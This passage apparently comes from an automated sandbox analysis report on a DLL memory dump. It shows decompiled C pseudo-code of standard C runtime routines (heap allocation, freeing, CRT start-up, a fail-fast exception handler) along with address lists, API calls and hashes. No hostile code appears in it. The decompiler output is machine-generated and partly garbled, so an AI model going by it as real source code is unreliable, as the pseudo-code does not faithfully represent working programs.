                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f4f
                                                                                                                                                                                                                                0x736d6f56
                                                                                                                                                                                                                                0x736d6f5b
                                                                                                                                                                                                                                0x736d6f6a
                                                                                                                                                                                                                                0x736d6f70
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f88
                                                                                                                                                                                                                                0x736d6f8f
                                                                                                                                                                                                                                0x736d6f99
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f9e
                                                                                                                                                                                                                                0x736d6fa5
                                                                                                                                                                                                                                0x736d6fac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6fae
                                                                                                                                                                                                                                0x736d6fb3
                                                                                                                                                                                                                                0x736d6fb5
                                                                                                                                                                                                                                0x736d6fb8
                                                                                                                                                                                                                                0x736d6fba
                                                                                                                                                                                                                                0x736d6fc3
                                                                                                                                                                                                                                0x736d6fd1
                                                                                                                                                                                                                                0x736d6fd7
                                                                                                                                                                                                                                0x736d6fd7
                                                                                                                                                                                                                                0x736d6fc3
                                                                                                                                                                                                                                0x736d6fd9
                                                                                                                                                                                                                                0x736d6fe1
                                                                                                                                                                                                                                0x736d6fe1
                                                                                                                                                                                                                                0x736d6ff3
                                                                                                                                                                                                                                0x736d6ff6
                                                                                                                                                                                                                                0x736d7002
                                                                                                                                                                                                                                0x736d7002
                                                                                                                                                                                                                                0x736d6f38

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D6F51
                                                                                                                                                                                                                                  • Part of subcall function 736D73CE: InitializeSListHead.KERNEL32(736EF448,736D6F5B,736E99E8,00000010,736D6EEC,?,?,?,736D7114,?,00000001,?,?,00000001,?,736E9A30), ref: 736D73D3
                                                                                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 736D6FBB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                                                                                • Opcode ID: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction ID: 1c5554c09717eb42efe43cba12dfe30ed7c7a9443ed4e3c542d528e0cf00d5be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 582135366A9B049FEF01AFB8C9043DC3BA2AF01229F540459D8866F0C2DF315048CA6B
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D91EC, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D91EC(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}



                                                                                                                                                                                                                                0x736d91f1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: GetEnvironmentStringsW.KERNEL32 ref: 736DB682
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: _free.LIBCMT ref: 736DB6E1
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 736DB6F0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D922C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9233
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$EnvironmentStrings$Free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2490078468-0
                                                                                                                                                                                                                                • Opcode ID: f727bfe0ca4f4f60fd33e8306e14971852a08de9ef515ba69526d3fe493a66c0
                                                                                                                                                                                                                                • Instruction ID: 8de06711ceb887746b8d78210eff3ebba2388ef234b580fe9b1236063579176e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f727bfe0ca4f4f60fd33e8306e14971852a08de9ef515ba69526d3fe493a66c0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E02B239BE71167FF535A3B7C0030937C56B82330B56031AD820DB1D9FA70C416019D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DA236, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA236(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x736efae0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E736DCC5C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E736DA223(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E736DBE4F(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                                                                                                                                                                                                                0x736da23c
                                                                                                                                                                                                                                0x736da241
                                                                                                                                                                                                                                0x736da24f
                                                                                                                                                                                                                                0x736da24f
                                                                                                                                                                                                                                0x736da255
                                                                                                                                                                                                                                0x736da257
                                                                                                                                                                                                                                0x736da257
                                                                                                                                                                                                                                0x736da26e
                                                                                                                                                                                                                                0x736da277
                                                                                                                                                                                                                                0x736da27f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da25f
                                                                                                                                                                                                                                0x736da261
                                                                                                                                                                                                                                0x736da283
                                                                                                                                                                                                                                0x736da288
                                                                                                                                                                                                                                0x736da28e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da28e
                                                                                                                                                                                                                                0x736da26a
                                                                                                                                                                                                                                0x736da26c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da26c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da26e
                                                                                                                                                                                                                                0x736da247
                                                                                                                                                                                                                                0x736da24d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,736D9E35,00000001,00000364,00000007,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736DA277
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 4873eb1b7c1cca0ddc2fdeb48710fde983e6a351e0f25cc83889d3253f583914
                                                                                                                                                                                                                                • Instruction ID: 03dd7258cfd7b65978eb93572a1008260d6ecb2ecc2c8459984fbac93de06f7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4873eb1b7c1cca0ddc2fdeb48710fde983e6a351e0f25cc83889d3253f583914
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F0E93297D2246BEF125A37DA04B5B3768AF81F70B1C4111EC0ADB3C8CA62D52082E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DC5DF, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC5DF(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E736DA223(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x736efae0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E736DCC5C();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E736DBE4F(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                0x736dc5e5
                                                                                                                                                                                                                                0x736dc5eb
                                                                                                                                                                                                                                0x736dc61d
                                                                                                                                                                                                                                0x736dc622
                                                                                                                                                                                                                                0x736dc628
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dc628
                                                                                                                                                                                                                                0x736dc5ef
                                                                                                                                                                                                                                0x736dc5f1
                                                                                                                                                                                                                                0x736dc5f1
                                                                                                                                                                                                                                0x736dc608
                                                                                                                                                                                                                                0x736dc611
                                                                                                                                                                                                                                0x736dc619
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dc5f9
                                                                                                                                                                                                                                0x736dc5fb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dc604
                                                                                                                                                                                                                                0x736dc606
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dc606
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,736DC31E,736DC31E,?,736DB04A,00000220,?,736DC31E,?,?,?,?,736DE432,00000001,?,?), ref: 736DC611
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: d29058318656684a1c306c4ee9d28767506024c06951c62a557ce39430923180
                                                                                                                                                                                                                                • Instruction ID: dcf5a7b9e3f7d9d11b665678a14681b08d068cbfda15a35909a88ff140b96ecf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29058318656684a1c306c4ee9d28767506024c06951c62a557ce39430923180
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE02B3193525867EF13166BCE04B477658AF455E1F192110EC8BA60C4CB60C42045E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 736D76ED, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D76ED(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E736D7808(_t34);
				 *_t60 = 0x2cc;
				_v632 = E736D7DE0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E736D7DE0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E736D7808(_t49);
				}
				return _t49;
			}


































                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d7701
                                                                                                                                                                                                                                0x736d7703
                                                                                                                                                                                                                                0x736d7706
                                                                                                                                                                                                                                0x736d7706
                                                                                                                                                                                                                                0x736d770a
                                                                                                                                                                                                                                0x736d770f
                                                                                                                                                                                                                                0x736d7727
                                                                                                                                                                                                                                0x736d772d
                                                                                                                                                                                                                                0x736d7733
                                                                                                                                                                                                                                0x736d7739
                                                                                                                                                                                                                                0x736d773f
                                                                                                                                                                                                                                0x736d7745
                                                                                                                                                                                                                                0x736d774b
                                                                                                                                                                                                                                0x736d7752
                                                                                                                                                                                                                                0x736d7759
                                                                                                                                                                                                                                0x736d7760
                                                                                                                                                                                                                                0x736d7767
                                                                                                                                                                                                                                0x736d776e
                                                                                                                                                                                                                                0x736d7775
                                                                                                                                                                                                                                0x736d7776
                                                                                                                                                                                                                                0x736d777f
                                                                                                                                                                                                                                0x736d7785
                                                                                                                                                                                                                                0x736d7788
                                                                                                                                                                                                                                0x736d778e
                                                                                                                                                                                                                                0x736d779d
                                                                                                                                                                                                                                0x736d77a9
                                                                                                                                                                                                                                0x736d77b4
                                                                                                                                                                                                                                0x736d77bb
                                                                                                                                                                                                                                0x736d77c2
                                                                                                                                                                                                                                0x736d77cd
                                                                                                                                                                                                                                0x736d77d5
                                                                                                                                                                                                                                0x736d77de
                                                                                                                                                                                                                                0x736d77e0
                                                                                                                                                                                                                                0x736d77e3
                                                                                                                                                                                                                                0x736d77e5
                                                                                                                                                                                                                                0x736d77ef
                                                                                                                                                                                                                                0x736d77f7
                                                                                                                                                                                                                                0x736d77fd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7804
                                                                                                                                                                                                                                0x736d7807

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 736D76F9
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 736D77C5
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 736D77E5
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 736D77EF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction ID: ba578deb28372b94fd4a343730852cda3a5210a302ad2b2cb0f2fc68afcb84f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3106B5D512189BDF11DFA5C989BCCBBB8BF08305F1040EAE40DAB280EB715A88DF45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DC947, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC947(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x736eb6f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E736DA293(_t46);
							E736DE879( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E736DA293(_t47);
							E736DE977( *((intOrPtr*)(_t74 + 0x88)));
						}
						E736DA293( *((intOrPtr*)(_t74 + 0x7c)));
						E736DA293( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E736DA293( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E736DA293( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E736DA293( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E736DA293( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E736DCABA( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x736eb640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E736DA293(_t31);
							E736DA293( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E736DA293(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E736DA293(_t74);
			}















                                                                                                                                                                                                                                0x736dc94f
                                                                                                                                                                                                                                0x736dc953
                                                                                                                                                                                                                                0x736dc95b
                                                                                                                                                                                                                                0x736dc964
                                                                                                                                                                                                                                0x736dc969
                                                                                                                                                                                                                                0x736dc970
                                                                                                                                                                                                                                0x736dc978
                                                                                                                                                                                                                                0x736dc980
                                                                                                                                                                                                                                0x736dc98b
                                                                                                                                                                                                                                0x736dc991
                                                                                                                                                                                                                                0x736dc992
                                                                                                                                                                                                                                0x736dc99a
                                                                                                                                                                                                                                0x736dc9a2
                                                                                                                                                                                                                                0x736dc9ad
                                                                                                                                                                                                                                0x736dc9b3
                                                                                                                                                                                                                                0x736dc9b7
                                                                                                                                                                                                                                0x736dc9c2
                                                                                                                                                                                                                                0x736dc9c8
                                                                                                                                                                                                                                0x736dc969
                                                                                                                                                                                                                                0x736dc9c9
                                                                                                                                                                                                                                0x736dc9d1
                                                                                                                                                                                                                                0x736dc9e4
                                                                                                                                                                                                                                0x736dc9f7
                                                                                                                                                                                                                                0x736dca05
                                                                                                                                                                                                                                0x736dca10
                                                                                                                                                                                                                                0x736dca15
                                                                                                                                                                                                                                0x736dca1e
                                                                                                                                                                                                                                0x736dca26
                                                                                                                                                                                                                                0x736dca27
                                                                                                                                                                                                                                0x736dca2d
                                                                                                                                                                                                                                0x736dca30
                                                                                                                                                                                                                                0x736dca33
                                                                                                                                                                                                                                0x736dca3a
                                                                                                                                                                                                                                0x736dca3c
                                                                                                                                                                                                                                0x736dca40
                                                                                                                                                                                                                                0x736dca48
                                                                                                                                                                                                                                0x736dca4f
                                                                                                                                                                                                                                0x736dca55
                                                                                                                                                                                                                                0x736dca56
                                                                                                                                                                                                                                0x736dca56
                                                                                                                                                                                                                                0x736dca5d
                                                                                                                                                                                                                                0x736dca5f
                                                                                                                                                                                                                                0x736dca5f
                                                                                                                                                                                                                                0x736dca64
                                                                                                                                                                                                                                0x736dca6c
                                                                                                                                                                                                                                0x736dca71
                                                                                                                                                                                                                                0x736dca72
                                                                                                                                                                                                                                0x736dca72
                                                                                                                                                                                                                                0x736dca75
                                                                                                                                                                                                                                0x736dca78
                                                                                                                                                                                                                                0x736dca7b
                                                                                                                                                                                                                                0x736dca7e
                                                                                                                                                                                                                                0x736dca7e
                                                                                                                                                                                                                                0x736dca90

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 736DC98B
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE896
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8A8
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8BA
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8CC
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8DE
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8F0
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE902
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE914
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE926
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE938
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE94A
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE95C
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE96E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC980
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9A2
